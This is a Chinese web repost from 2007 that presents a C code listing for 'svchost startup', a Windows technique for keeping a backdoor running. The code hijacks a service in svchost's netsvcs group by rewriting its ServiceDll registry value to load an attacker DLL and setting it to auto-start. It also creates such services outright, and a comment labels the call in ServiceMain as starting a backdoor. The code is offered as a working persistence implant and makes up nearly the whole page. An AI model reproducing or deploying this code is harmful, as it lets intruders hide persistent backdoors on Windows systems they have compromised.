SVCHOST启动技术

www.8tops.com 2007-10-6 10:19:05　　发布：尼奥
媒体：邪恶八进制信息安全团队作者：dream2fly.

//说明：大部门代码来自bingle的文章，感谢bingle，并加入装载自启动代码
//感谢使用，幻影光临白帽子实验室http://www.dream2fly.net/forum
Code Language : C

1.

2.
//Service HANDLE & STATUS used to get service state
3.
SERVICE_STATUS_HANDLE hSrv;
4.
DWORD dwCurrState;
5.

6.
//report service stat to the service control manager
7.
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
8.

9.
//RealService just create a process dream2fly.net
10.
int ControlService(DWORD dwCommand)
11.
{
12.
char cmd[MAX_PATH] = {0};
13.
if (dwCommand == SERVICE_CONTROL_CONTINUE)
14.
{
15.
strcpy(cmd, "net start ");
16.
}
17.
else if(dwCommand == SERVICE_CONTROL_STOP)
18.
{
19.
strcpy(cmd, "net stop ");
20.
}
21.
strcat(cmd, stServiceCfg.szSvcName);
22.

23.
PROCESS_INFORMATION pi;
24.
STARTUPINFO si;
25.
memset(&si,0,sizeof(si));
26.
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
27.
si.wShowWindow=SW_HIDE;
28.
if(!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
29.
OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
30.
else OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);
31.

32.
return 0;
33.
}
34.

35.
int ReplaceService()
36.
{
37.
int rc = 0;
38.
HKEY hKey = 0;
39.

40.
try{
41.
char buff[500];
42.

43.
//query svchost setting
44.
char *ptr, *pSvchost = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost";
45.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
46.
if(ERROR_SUCCESS != rc)
47.
{
48.
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
49.
throw "";
50.
}
51.

52.
DWORD type, size = sizeof buff;
53.
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
54.
RegCloseKey(hKey);
55.
SetLastError(rc);
56.
if(ERROR_SUCCESS != rc)
57.
throw "RegQueryValueEx(Svchost\\netsvcs)";
58.

59.
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
60.
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;
61.

62.
if(*ptr == 0)
63.
{
64.
OutputString("you specify service name not in Svchost\\netsvcs, must be one of following:");
65.
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
66.
OutputString(" - %s", ptr);
67.
throw "";
68.
}
69.

70.
//config service
71.
strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
72.
strcat(buff, stServiceCfg.szSvcName);
73.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
74.
if(ERROR_SUCCESS != rc)
75.
{
76.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
77.
throw "";
78.
}
79.

80.
DWORD dwValue = 2;//auto start
81.
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
82.
SetLastError(rc);
83.
if(ERROR_SUCCESS != rc)
84.
throw "RegSetValueEx(start)";
85.

86.
////////////////////
87.
char szDllPath[MAX_PATH] = {0};
88.
if(!GetModuleFileName(HMODULE(hDll), szDllPath, sizeof szDllPath))
89.
throw "GetModuleFileName() get dll path";
90.

91.
LogToFile(szDllPath, GetLastError());
92.

93.
strcat(buff, "\\Parameters");
94.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
95.
if(ERROR_SUCCESS != rc)
96.
{
97.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
98.
throw "";
99.
}
100.
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
101.
SetLastError(rc);
102.
if(ERROR_SUCCESS != rc)
103.
throw "RegSetValueEx(ServiceDll)";
104.

105.

106.
OutputString("Config service %s ok.", stServiceCfg.szSvcName);
107.
}
108.
catch(char *str)
109.
{
110.
if(str && str[0])
111.
{
112.
rc = GetLastError();
113.
OutputString("%s error %d", str, rc);
114.
}
115.
}
116.

117.
RegCloseKey(hKey);
118.

119.
//启动服务
120.
ControlService(SERVICE_CONTROL_CONTINUE);
121.

122.
return 0;
123.
}
124.

125.
int RecoverService()
126.
{
127.
int rc = 0;
128.
HKEY hKey = 0;
129.

130.
try{
131.
LogToFile("RecoverService");
132.
char buff[500];
133.

134.
//config service
135.
strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
136.
strcat(buff, stServiceCfg.szSvcName);
137.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
138.
if(ERROR_SUCCESS != rc)
139.
{
140.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
141.
throw "";
142.
}
143.

144.
LogToFile("RegSetValueEx");
145.
DWORD dwValue = 3;//manule start
146.
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
147.
SetLastError(rc);
148.
if(ERROR_SUCCESS != rc)
149.
throw "RegSetValueEx(start)";
150.

151.
////////////////////
152.
char szDllPath[MAX_PATH] = {0};
153.
strcpy(szDllPath, "%SystemRoot%\\System32\\qmgr.dll");
154.

155.
strcat(buff, "\\Parameters");
156.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
157.
if(ERROR_SUCCESS != rc)
158.
{
159.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
160.
throw "";
161.
}
162.
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
163.
SetLastError(rc);
164.
if(ERROR_SUCCESS != rc)
165.
throw "RegSetValueEx(ServiceDll)";
166.

167.

168.
OutputString("RecoverService(%s) SUCCESS.", stServiceCfg.szSvcName);
169.
}
170.
catch(char *str)
171.
{
172.
if(str && str[0])
173.
{
174.
LogToFile(str);
175.
rc = GetLastError();
176.
OutputString("%s error %d", str, rc);
177.
}
178.
}
179.

180.
RegCloseKey(hKey);
181.

182.
//说明：大部门代码来自bingle的文章，感谢bingle，并加入装载自启动代码
183.
//感谢使用，幻影光临白帽子实验室http://www.dream2fly.net/forum
184.

185.
ControlService(SERVICE_CONTROL_STOP);
186.
return 0;
187.
}
188.

189.
BOOL InstallService()
190.
{
191.
// Open a handle to the SC Manager database.
192.
int rc = 0;
193.
HKEY hKey, hkParam = 0;
194.
SC_HANDLE hscm = NULL, schService = NULL;
195.

196.
try{
197.
char buff[500];
198.

199.
//query svchost setting
200.
char *ptr, *pSvchost = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost";
201.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
202.
if(ERROR_SUCCESS != rc)
203.
{
204.
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
205.
throw "";
206.
}
207.

208.
DWORD type, size = sizeof buff;
209.
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
210.
RegCloseKey(hKey);
211.
SetLastError(rc);
212.
if(ERROR_SUCCESS != rc)
213.
throw "RegQueryValueEx(Svchost\\netsvcs)";
214.

215.
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
216.
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;
217.

218.
if(*ptr == 0)
219.
{
220.
OutputString("you specify service name not in Svchost\\netsvcs, must be one of following:");
221.
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
222.
OutputString(" - %s", ptr);
223.
throw "";
224.
}
225.

226.
//create service
227.
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
228.
if (hscm == NULL)
229.
throw "OpenSCManager()";
230.

231.
char *bin = "%SystemRoot%\\system32\\svchost.exe -k netsvcs";
232.
schService = CreateService(
233.
hscm, // SCManager database
234.
stServiceCfg.szSvcName, // name of service
235.
stServiceCfg.szSvcName, // service name to display
236.
SERVICE_ALL_ACCESS, // desired access
237.
SERVICE_WIN32_SHARE_PROCESS, // service type
238.
SERVICE_AUTO_START, // start type
239.
SERVICE_ERROR_NORMAL, // error control type
240.
bin, // service"s binary
241.
NULL, // no load ordering group
242.
NULL, // no tag identifier
243.
NULL, // no dependencies
244.
NULL, // LocalSystem account
245.
NULL); // no password
246.

247.
if (schService == NULL)
248.
{
249.
OutputString("CreateService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError());
250.
throw "";
251.
}
252.
OutputString("CreateService(%s) SUCCESS. Config it path %s", stServiceCfg.szSvcName, bin);
253.

254.
CloseServiceHandle(schService);
255.
CloseServiceHandle(hscm);
256.

257.

258.
//config service
259.
strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
260.
strncat(buff, stServiceCfg.szSvcName, 100);
261.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
262.
if(ERROR_SUCCESS != rc)
263.
{
264.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
265.
throw "";
266.
}
267.

268.
rc = RegCreateKey(hKey, "Parameters", &hkParam);
269.
SetLastError(rc);
270.
if(ERROR_SUCCESS != rc)
271.
throw "RegCreateKey(Parameters)";
272.

273.
if(!GetModuleFileName(HMODULE(hDll), buff, sizeof buff))
274.
throw "GetModuleFileName() get dll path";
275.

276.
rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)buff, strlen(buff)+1);
277.
SetLastError(rc);
278.
if(ERROR_SUCCESS != rc)
279.
throw "RegSetValueEx(ServiceDll)";
280.

281.
OutputString("Config service %s ok.", stServiceCfg.szSvcName);
282.
}
283.
catch(char *str)
284.
{
285.
if(str && str[0])
286.
{
287.
rc = GetLastError();
288.
OutputString("%s error %d", str, rc);
289.
}
290.
}
291.

292.
RegCloseKey(hKey);
293.
RegCloseKey(hkParam);
294.
CloseServiceHandle(schService);
295.
CloseServiceHandle(hscm);
296.
//说明：大部门代码来自bingle的文章，感谢bingle，并加入装载自启动代码
297.
//感谢使用，幻影光临白帽子实验室http://www.dream2fly.net/forum
298.

299.
//启动服务
300.
ControlService(SERVICE_CONTROL_CONTINUE);
301.

302.
return rc;
303.
}
304.

305.
int UninstallService()
306.
{
307.
int rc = 0;
308.
SC_HANDLE schService;
309.
SC_HANDLE hscm;
310.

311.
__try{
312.
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
313.
if (hscm == NULL)
314.
{
315.
OutputString("OpenSCManager() error %d", rc = GetLastError() );
316.
return rc;
317.
}
318.

319.
schService = OpenService(hscm, stServiceCfg.szSvcName, DELETE);
320.
if (schService == NULL)
321.
{
322.
OutputString("OpenService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError() );
323.
return rc;
324.
}
325.

326.
if (!DeleteService(schService) )
327.
{
328.
OutputString("OpenService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError() );
329.
return rc;
330.
}
331.

332.
OutputString("DeleteService(%s) SUCCESS.", stServiceCfg.szSvcName);
333.
}
334.
__except(1)
335.
{
336.
OutputString("Exception Catched 0x%X", GetExceptionCode());
337.
}
338.

339.
CloseServiceHandle(schService);
340.
CloseServiceHandle(hscm);
341.

342.
ControlService(SERVICE_CONTROL_STOP);
343.

344.
return rc;
345.
}
346.

347.
void ServiceMain( int argc, wchar_t *argv[])
348.
{
349.
char svcname[256];
350.
strncpy(svcname, (char*)argv[0], sizeof svcname); //it"s should be unicode, but if it"s ansi we do it well
351.
wcstombs(svcname, argv[0], sizeof svcname);
352.
OutputString("SvcHostDLL: ServiceMain(%d, %s) called", argc, svcname);
353.

354.
hSrv = RegisterServiceCtrlHandler( svcname, (LPHANDLER_FUNCTION)ServiceHandler );
355.
if( hSrv == NULL )
356.
{
357.
OutputString("SvcHostDLL: RegisterServiceCtrlHandler %S failed", argv[0]);
358.
return;
359.
}
360.

361.
TellSCM( SERVICE_START_PENDING, 0, 1 );
362.
TellSCM( SERVICE_RUNNING, 0, 0 );
363.

364.
StartShell();//启动后门dream2fly.net
365.

366.
OutputString("SvcHostDLL: ServiceMain done");
367.
return;
368.
}
369.

370.
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
371.
{
372.
SERVICE_STATUS srvStatus;
373.
srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
374.
srvStatus.dwCurrentState = dwCurrState = dwState;
375.
srvStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
376.
srvStatus.dwWin32ExitCode = dwExitCode;
377.
srvStatus.dwServiceSpecificExitCode = 0;
378.
srvStatus.dwCheckPoint = dwProgress;
379.
srvStatus.dwWaitHint = 3000;
380.
return SetServiceStatus( hSrv, &srvStatus );
381.
}
382.

383.
void __stdcall ServiceHandler( DWORD dwCommand )
384.
{
385.
// not really necessary because the service stops quickly
386.
switch( dwCommand )
387.
{
388.
case SERVICE_CONTROL_STOP:
389.
TellSCM( SERVICE_STOP_PENDING, 0, 1 );
390.
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_STOP");
391.
Sleep(10);
392.
TellSCM( SERVICE_STOPPED, 0, 0 );
393.
break;
394.
case SERVICE_CONTROL_PAUSE:
395.
TellSCM( SERVICE_PAUSE_PENDING, 0, 1 );
396.
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_PAUSE");
397.
TellSCM( SERVICE_PAUSED, 0, 0 );
398.
break;
399.
case SERVICE_CONTROL_CONTINUE:
400.
TellSCM( SERVICE_CONTINUE_PENDING, 0, 1 );
401.
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_CONTINUE");
402.
TellSCM( SERVICE_RUNNING, 0, 0 );
403.
break;
404.
case SERVICE_CONTROL_INTERROGATE:
405.
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_INTERROGATE");
406.
TellSCM( dwCurrState, 0, 0 );
407.
break;
408.
case SERVICE_CONTROL_SHUTDOWN:
409.
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_SHUTDOWN");
410.
TellSCM( SERVICE_STOPPED, 0, 0 );
411.
break;
412.
}
413.
}

八强网，更多精彩在首页，

发表

发文时请务必注意：

一、遵守国家相关法律规定，如《北京地区互联网站电子公告服务倡议书》，《全国人大常委会关于维护互联网安全的决定》及中华人民共和国其他各项有关法律法规。一旦违犯法律法规，您将承担一切因您的行为而直接或间接导致的民事或刑事法律责任，本站工作人员有义务配合相关部门，提供必要的技术资料（如IP地址等）。
二、自觉遵守爱国、守法、自律、真实、文明的原则，严禁发表有人身攻击倾向、有造谣生事嫌疑的言论，严禁发表虚假广告、色情、网络传销性质的内容，本站管理人员有权删除违反规定的内容或取消违规网友的发文权限甚至删除其ID。

互联网产业作家

E-file：尼奥

尼奥的最新文章：

SVCHOST启动技术

发表

我也评两句

互联网产业作家